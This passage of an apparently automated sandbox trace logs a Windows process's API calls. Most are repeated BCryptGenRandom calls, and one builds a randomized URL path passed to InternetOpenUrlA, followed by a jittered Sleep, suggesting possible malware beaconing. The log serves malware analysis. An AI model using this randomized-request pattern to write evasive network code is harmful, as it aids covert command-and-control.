pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.612] GetProcessHeap () returned 0x440000 [0194.612] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0194.612] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0194.612] lstrcatA (in: lpString1="\x04", lpString2="/pcs5MXml6oV1fhpmQ82dq9R6stxExn34lg39guwv464c/wrxWevqBglx51Pnr0y/vqa82a1abtuo3ugD/5gv0lkkzmna5iveDQQy6j3p5lyUzeYLrjz/ukr5inuJkUisSfmpexxoacagf6f770abyhWsoch/" | out: lpString1="\x04/pcs5MXml6oV1fhpmQ82dq9R6stxExn34lg39guwv464c/wrxWevqBglx51Pnr0y/vqa82a1abtuo3ugD/5gv0lkkzmna5iveDQQy6j3p5lyUzeYLrjz/ukr5inuJkUisSfmpexxoacagf6f770abyhWsoch/") returned="\x04/pcs5MXml6oV1fhpmQ82dq9R6stxExn34lg39guwv464c/wrxWevqBglx51Pnr0y/vqa82a1abtuo3ugD/5gv0lkkzmna5iveDQQy6j3p5lyUzeYLrjz/ukr5inuJkUisSfmpexxoacagf6f770abyhWsoch/" [0194.613] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0194.613] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/pcs5MXml6oV1fhpmQ82dq9R6stxExn34lg39guwv464c/wrxWevqBglx51Pnr0y/vqa82a1abtuo3ugD/5gv0lkkzmna5iveDQQy6j3p5lyUzeYLrjz/ukr5inuJkUisSfmpexxoacagf6f770abyhWsoch/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0194.613] GetProcessHeap () returned 0x440000 [0194.613] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0194.613] GetProcessHeap () returned 0x440000 [0194.613] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a03350 | out: hHeap=0x440000) returned 1 [0194.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0194.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0194.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0194.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0194.616] Sleep (dwMilliseconds=0x10582) [0194.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0194.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.839] GetProcessHeap () returned 0x440000 [0194.839] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0194.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0194.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0195.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0195.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e47, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d5e47) returned 0x0 [0195.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0195.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e62, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e62) returned 0x0 [0195.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0195.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0195.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0195.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 